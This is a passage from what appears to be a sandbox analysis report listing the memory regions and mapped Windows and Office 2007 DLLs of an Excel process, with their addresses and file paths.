0x4f30000 end_va = 0x4f31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f30000" filename = "" Region: id = 326 start_va = 0x4f40000 end_va = 0x4f40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f40000" filename = "" Region: id = 327 start_va = 0x4f50000 end_va = 0x4f51fff entry_point = 0x4f50000 region_type = mapped_file name = "mssvp.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mssvp.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mssvp.dll.mui") Region: id = 328 start_va = 0x4f60000 end_va = 0x4f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f60000" filename = "" Region: id = 329 start_va = 0x4fa0000 end_va = 0x4fa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004fa0000" filename = "" Region: id = 330 start_va = 0x4fb0000 end_va = 0x4fb1fff entry_point = 0x0 region_type = private name = "private_0x0000000004fb0000" filename = "" Region: id = 331 start_va = 0x4fc0000 end_va = 0x50bffff entry_point = 0x0 region_type = private name = "private_0x0000000004fc0000" filename = "" Region: id = 332 start_va = 0x50c0000 end_va = 0x52bffff entry_point = 0x0 region_type = private name = "private_0x00000000050c0000" filename = "" Region: id = 333 start_va = 0x52c0000 end_va = 0x52c0fff entry_point = 0x0 region_type = private name = "private_0x00000000052c0000" filename = "" Region: id = 334 start_va = 0x52d0000 end_va = 0x52d1fff entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 335 start_va = 0x52e0000 end_va = 0x52e8fff entry_point = 0x0 region_type = private name = "private_0x00000000052e0000" filename = "" Region: id = 336 start_va = 0x52f0000 end_va = 0x532ffff entry_point = 0x0 region_type = private name = "private_0x00000000052f0000" filename = "" Region: id = 337 start_va = 0x5330000 end_va = 0x5332fff entry_point = 0x0 region_type = private name = "private_0x0000000005330000" filename = "" Region: id = 338 start_va = 0x5340000 end_va = 0x5342fff entry_point = 0x0 region_type = private name = "private_0x0000000005340000" filename = "" Region: id = 339 start_va = 0x5350000 end_va = 0x538ffff entry_point = 0x0 region_type = private name = "private_0x0000000005350000" filename = "" Region: id = 340 start_va = 0x5390000 end_va = 0x53cffff entry_point = 0x0 region_type = private name = "private_0x0000000005390000" filename = "" Region: id = 341 start_va = 0x53d0000 end_va = 0x540ffff entry_point = 0x0 region_type = private name = "private_0x00000000053d0000" filename = "" Region: id = 342 start_va = 0x5430000 end_va = 0x546ffff entry_point = 0x0 region_type = private name = "private_0x0000000005430000" filename = "" Region: id = 343 start_va = 0x54b0000 end_va = 0x55affff entry_point = 0x0 region_type = private name = "private_0x00000000054b0000" filename = "" Region: id = 344 start_va = 0x55d0000 end_va = 0x56cffff entry_point = 0x0 region_type = private name = "private_0x00000000055d0000" filename = "" Region: id = 345 start_va = 0x56d0000 end_va = 0x570ffff entry_point = 0x0 region_type = private name = "private_0x00000000056d0000" filename = "" Region: id = 346 start_va = 0x5710000 end_va = 0x580ffff entry_point = 0x0 region_type = private name = "private_0x0000000005710000" filename = "" Region: id = 347 start_va = 0x5830000 end_va = 0x586ffff entry_point = 0x0 region_type = private name = "private_0x0000000005830000" filename = "" Region: id = 348 start_va = 0x58a0000 end_va = 0x58dffff entry_point = 0x0 region_type = private name = "private_0x00000000058a0000" filename = "" Region: id = 349 start_va = 0x58f0000 end_va = 0x59effff entry_point = 0x0 region_type = private name = "private_0x00000000058f0000" filename = "" Region: id = 350 start_va = 0x5a10000 end_va = 0x5a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a10000" filename = "" Region: id = 351 start_va = 0x5b20000 end_va = 0x5c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000005b20000" filename = "" Region: id = 352 start_va = 0x5c20000 end_va = 0x5e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 353 start_va = 0x5f80000 end_va = 0x607ffff entry_point = 0x0 region_type = private name = "private_0x0000000005f80000" filename = "" Region: id = 354 start_va = 0x6160000 end_va = 0x625ffff entry_point = 0x0 region_type = private name = "private_0x0000000006160000" filename = "" Region: id = 355 start_va = 0x6320000 end_va = 0x641ffff entry_point = 0x0 region_type = private name = "private_0x0000000006320000" filename = "" Region: id = 356 start_va = 0x7860000 end_va = 0x795ffff entry_point = 0x0 region_type = private name = "private_0x0000000007860000" filename = "" Region: id = 357 start_va = 0x79e0000 end_va = 0x7adffff entry_point = 0x0 region_type = private name = "private_0x00000000079e0000" filename = "" Region: id = 358 start_va = 0x7c10000 end_va = 0x7d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000007c10000" filename = "" Region: id = 359 start_va = 0x2fe50000 end_va = 0x30f67fff entry_point = 0x2fe50000 region_type = mapped_file name = "excel.exe" filename = "\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office12\\excel.exe") Region: id = 360 start_va = 0x6eac0000 end_va = 0x6eac7fff entry_point = 0x6eac0000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 361 start_va = 0x6ead0000 end_va = 0x6eae6fff entry_point = 0x6ead0000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 362 start_va = 0x6eaf0000 end_va = 0x6eb03fff entry_point = 0x6eaf0000 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 363 start_va = 0x6fe50000 end_va = 0x6fe58fff entry_point = 0x6fe50000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 364 start_va = 0x6fe60000 end_va = 0x6fe6efff entry_point = 0x6fe60000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 365 start_va = 0x6fe70000 end_va = 0x6fe81fff entry_point = 0x6fe70000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 366 start_va = 0x6fe90000 end_va = 0x6feddfff entry_point = 0x6fe90000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 367 start_va = 0x6fee0000 end_va = 0x6ff0afff entry_point = 0x6fee0000 region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files (x86)\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieproxy.dll") Region: id = 368 start_va = 0x6ff10000 end_va = 0x6ff25fff entry_point = 0x6ff10000 region_type = mapped_file name = "mapi32.dll" filename = "\\Windows\\SysWOW64\\mapi32.dll" (normalized: "c:\\windows\\syswow64\\mapi32.dll") Region: id = 369 start_va = 0x6ff30000 end_va = 0x6ffd5fff entry_point = 0x6ff30000 region_type = mapped_file name = "mssvp.dll" filename = "\\Windows\\SysWOW64\\mssvp.dll" (normalized: "c:\\windows\\syswow64\\mssvp.dll") Region: id = 370 start_va = 0x6ffe0000 end_va = 0x7001bfff entry_point = 0x6ffe0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 371 start_va = 0x70020000 end_va = 0x70a9ffff entry_point = 0x70020000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 372 start_va = 0x70aa0000 end_va = 0x70acdfff entry_point = 0x70aa0000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\SysWOW64\\shdocvw.dll" (normalized: "c:\\windows\\syswow64\\shdocvw.dll") Region: id = 373 start_va = 0x70ad0000 end_va = 0x70ae5fff entry_point = 0x70ad0000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\SysWOW64\\thumbcache.dll" (normalized: "c:\\windows\\syswow64\\thumbcache.dll") Region: id = 374 start_va = 0x70af0000 end_va = 0x70b4bfff entry_point = 0x70af0000 region_type = mapped_file name = "structuredquery.dll" filename = "\\Windows\\SysWOW64\\StructuredQuery.dll" (normalized: "c:\\windows\\syswow64\\structuredquery.dll") Region: id = 375 start_va = 0x70b50000 end_va = 0x70beffff entry_point = 0x70b50000 region_type = mapped_file name = "searchfolder.dll" filename = "\\Windows\\SysWOW64\\SearchFolder.dll" (normalized: "c:\\windows\\syswow64\\searchfolder.dll") Region: id = 376 start_va = 0x70bf0000 end_va = 0x70c1efff entry_point = 0x70bf0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 377 start_va = 0x70c20000 end_va = 0x70c49fff entry_point = 0x70c20000 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll") Region: id = 378 start_va = 0x70c50000 end_va = 0x70ce3fff entry_point = 0x70c50000 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\SysWOW64\\msftedit.dll" (normalized: "c:\\windows\\syswow64\\msftedit.dll") Region: id = 379 start_va = 0x70cf0000 end_va = 0x70cf7fff entry_point = 0x70cf0000 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 380 start_va = 0x70d00000 end_va = 0x70d07fff entry_point = 0x70d00000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 381 start_va = 0x70d10000 end_va = 0x70d18fff entry_point = 0x70d10000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 382 start_va = 0x70d20000 end_va = 0x70d29fff entry_point = 0x70d20000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 383 start_va = 0x70d30000 end_va = 0x70d3afff entry_point = 0x70d30000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 384 start_va = 0x70d40000 end_va = 0x70daffff entry_point = 0x70d40000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 385 start_va = 0x70db0000 end_va = 0x70de0fff entry_point = 0x70db0000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\SysWOW64\\EhStorShell.dll" (normalized: "c:\\windows\\syswow64\\ehstorshell.dll") Region: id = 386 start_va = 0x70df0000 end_va = 0x70eeafff entry_point = 0x70df0000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 387 start_va = 0x70ef0000 end_va = 0x70fa1fff entry_point = 0x70ef0000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\SysWOW64\\dui70.dll" (normalized: "c:\\windows\\syswow64\\dui70.dll") Region: id = 388 start_va = 0x70fb0000 end_va = 0x70fdefff entry_point = 0x70fb0000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\SysWOW64\\duser.dll" (normalized: "c:\\windows\\syswow64\\duser.dll") Region: id = 389 start_va = 0x70fe0000 end_va = 0x7114efff entry_point = 0x70fe0000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\SysWOW64\\ExplorerFrame.dll" (normalized: "c:\\windows\\syswow64\\explorerframe.dll") Region: id = 390 start_va = 0x71150000 end_va = 0x712e7fff entry_point = 0x71150000 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\SysWOW64\\networkexplorer.dll" (normalized: "c:\\windows\\syswow64\\networkexplorer.dll") Region: id = 391 start_va = 0x712f0000 end_va = 0x71cccfff entry_point = 0x712f0000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE12\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office12\\1033\\msointl.dll") Region: id = 392 start_va = 0x71cd0000 end_va = 0x72ce7fff entry_point = 0x71cd0000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE12\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office12\\mso.dll") Region: id = 393 start_va = 0x72cf0000 end_va = 0x73a6ffff entry_point = 0x72cf0000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office12\\OART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office12\\oart.dll") Region: id = 394 start_va = 0x73a70000 end_va = 0x73a88fff entry_point = 0x73a70000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 395 start_va = 0x73a90000 end_va = 0x73ae7fff entry_point = 0x73a90000 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 396 start_va = 0x73af0000 end_va = 0x73b73fff entry_point = 0x73af0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 397 start_va = 0x73b80000 end_va = 0x73bcbfff entry_point = 0x73b80000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 398 start_va = 0x73bd0000 end_va = 0x73bf0fff entry_point = 0x73bd0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 399 start_va = 0x73c00000 end_va = 0x73c06fff entry_point = 0x73c00000 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\SysWOW64\\midimap.dll" (normalized: "c:\\windows\\syswow64\\midimap.dll") Region: id = 400 start_va = 0x73c10000 end_va = 0x73c23fff entry_point = 0x73c10000 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\SysWOW64\\msacm32.dll" (normalized: "c:\\windows\\syswow64\\msacm32.dll") Region: id = 401 start_va = 0x73c30000 end_va = 0x73c37fff entry_point = 0x73c30000 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\SysWOW64\\msacm32.drv" (normalized: "c:\\windows\\syswow64\\msacm32.drv") Region: id = 402 start_va = 0x73c40000 end_va = 0x73c75fff entry_point = 0x73c40000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\SysWOW64\\AudioSes.dll" (normalized: "c:\\windows\\syswow64\\audioses.dll") Region: id = 403 start_va = 0x73c80000 end_va = 0x73c86fff entry_point = 0x73c80000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\SysWOW64\\avrt.dll" (normalized: "c:\\windows\\syswow64\\avrt.dll") Region: id = 404 start_va = 0x73c90000 end_va = 0x73c93fff entry_point = 0x73c90000 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\SysWOW64\\ksuser.dll" (normalized: "c:\\windows\\syswow64\\ksuser.dll") Region: id = 405 start_va = 0x73ca0000 end_va = 0x73ccffff entry_point = 0x73ca0000 region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\SysWOW64\\wdmaud.drv" (normalized: "c:\\windows\\syswow64\\wdmaud.drv") Region: id = 406 start_va = 0x73cd0000 end_va = 0x73dc4fff entry_point = 0x73cd0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 407 start_va = 0x73dd0000 end_va = 0x73e08fff entry_point = 0x73dd0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\SysWOW64\\MMDevAPI.dll" (normalized: "c:\\windows\\syswow64\\mmdevapi.dll") Region: id = 408 start_va = 0x73e10000 end_va = 0x73e41fff entry_point = 0x73e10000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 409 start_va = 0x73e50000 end_va = 0x73e63fff entry_point = 0x73e50000 region_type = mapped_file name = "msohev.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office12\\MSOHEV.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office12\\msohev.dll") Region: id = 410 start_va = 0x73e70000 end_va = 0x73eaafff entry_point = 0x73e70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 411 start_va = 0x73eb0000 end_va = 0x73ec5fff entry_point = 0x73eb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 412 start_va = 0x73ed0000 end_va = 0x73fd8fff entry_point = 0x73ed0000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE12\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office12\\riched20.dll") Region: id = 413 start_va = 0x73fe0000 end_va = 0x74059fff entry_point = 0x73fe0000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 414 start_va = 0x74060000 end_va = 0x740a9fff entry_point = 0x74060000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 415 start_va = 0x740b0000 end_va = 0x74244fff entry_point = 0x740b0000 region_type = mapped_file name = "ogl.dll" filename = "\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE12\\OGL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office12\\ogl.dll") Region: id = 416 start_va = 0x74260000 end_va = 0x7426dfff entry_point = 0x74260000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 417 start_va = 0x74290000 end_va = 0x7429afff entry_point = 0x74290000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 418 start_va = 0x742a0000 end_va = 0x748f3fff entry_point = 0x742a0000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE12\\MSORES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office12\\msores.dll") Region: id = 419 start_va = 0x74900000 end_va = 0x74a9dfff entry_point = 0x74900000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 420 start_va = 0x74aa0000 end_va = 0x74ac8fff entry_point = 0x74aa0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 421 start_va = 0x74ad0000 end_va = 0x74adcfff entry_point = 0x74ad0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 422 start_va = 0x74ae0000 end_va = 0x74ae8fff entry_point = 0x74ae0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 423 start_va = 0x74af0000 end_va = 0x74afafff entry_point = 0x74af0000 region_type = mapped_file name = "msimtf.dll" filename = "\\Windows\\SysWOW64\\msimtf.dll" (normalized: "c:\\windows\\syswow64\\msimtf.dll") Region: id = 424 start_va = 0x74b00000 end_va = 0x74d3ffff entry_point = 0x74b00000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 425 start_va = 0x74d40000 end_va = 0x74d90fff entry_point = 0x74d40000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 426 start_va = 0x74da0000 end_va = 0x74e3afff entry_point = 0x74da0000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll") Region: id = 427 start_va = 0x74e40000 end_va = 0x74e52fff entry_point = 0x74e40000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 428 start_va = 0x74e60000 end_va = 0x74edffff entry_point = 0x74e60000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 429 start_va = 0x74ef0000 end_va = 0x74ef7fff entry_point = 0x74ef0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 430 start_va = 0x74f00000 end_va = 0x74f5bfff entry_point = 0x74f00000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 431 start_va = 0x74f60000 end_va = 0x74f9efff entry_point = 0x74f60000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 432 start_va = 0x756b0000 end_va = 0x756bbfff entry_point = 0x756b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 433 start_va = 0x756c0000 end_va = 0x7571ffff entry_point = 0x756c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 434 start_va = 0x75720000 end_va = 0x757ebfff entry_point = 0x75720000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 435 start_va = 0x757f0000 end_va = 0x7587efff entry_point = 0x757f0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 436 start_va = 0x758e0000 end_va = 0x758f1fff entry_point = 0x758e0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 437 start_va = 0x75900000 end_va = 0x75926fff entry_point = 0x75900000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 438 start_va = 0x75930000 end_va = 0x75a2ffff entry_point = 0x75930000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 439 start_va = 0x75a30000 end_va = 0x75a5cfff entry_point = 0x75a30000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 440 start_va = 0x75a60000 end_va = 0x75abffff entry_point = 0x75a60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 441 start_va = 0x75ac0000 end_va = 0x75b42fff entry_point = 0x75ac0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 442 start_va = 0x75b80000 end_va = 0x75b84fff entry_point = 0x75b80000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 443 start_va = 0x75b90000 end_va = 0x75cacfff entry_point = 0x75b90000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 444 start_va = 0x75cb0000 end_va = 0x75cf4fff entry_point = 0x75cb0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 445 start_va = 0x75e00000 end_va = 0x75e0bfff entry_point = 0x75e00000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 446 start_va = 0x75e10000 end_va = 0x75f6bfff entry_point = 0x75e10000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 447 start_va = 0x76010000 end_va = 0x760fffff entry_point = 0x76010000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 448 start_va = 0x76100000 end_va = 0x76d49fff entry_point = 0x76100000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 449 start_va = 0x76d50000 end_va = 0x76decfff entry_point = 0x76d50000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 450 start_va = 0x76df0000 end_va = 0x76efffff entry_point = 0x76df0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 451 start_va = 0x76f00000 end_va = 0x76f09fff entry_point = 0x76f00000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 452 start_va = 0x76f10000 end_va = 0x76f66fff entry_point = 0x76f10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 453 start_va = 0x76f70000 end_va = 0x7716afff entry_point = 0x76f70000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 454 start_va = 0x772b0000 end_va = 0x7732afff entry_point = 0x772b0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 455 start_va = 0x77330000 end_va = 0x773cffff entry_point = 0x77330000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 456 start_va = 0x773d0000 end_va = 0x77415fff entry_point = 0x773d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 457 start_va = 0x77420000 end_va = 0x774affff entry_point = 0x77420000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 458 start_va = 0x774b0000 end_va = 0x7755bfff entry_point = 0x774b0000 region_type = mapped_file name = "msvcrt.dll" filename = 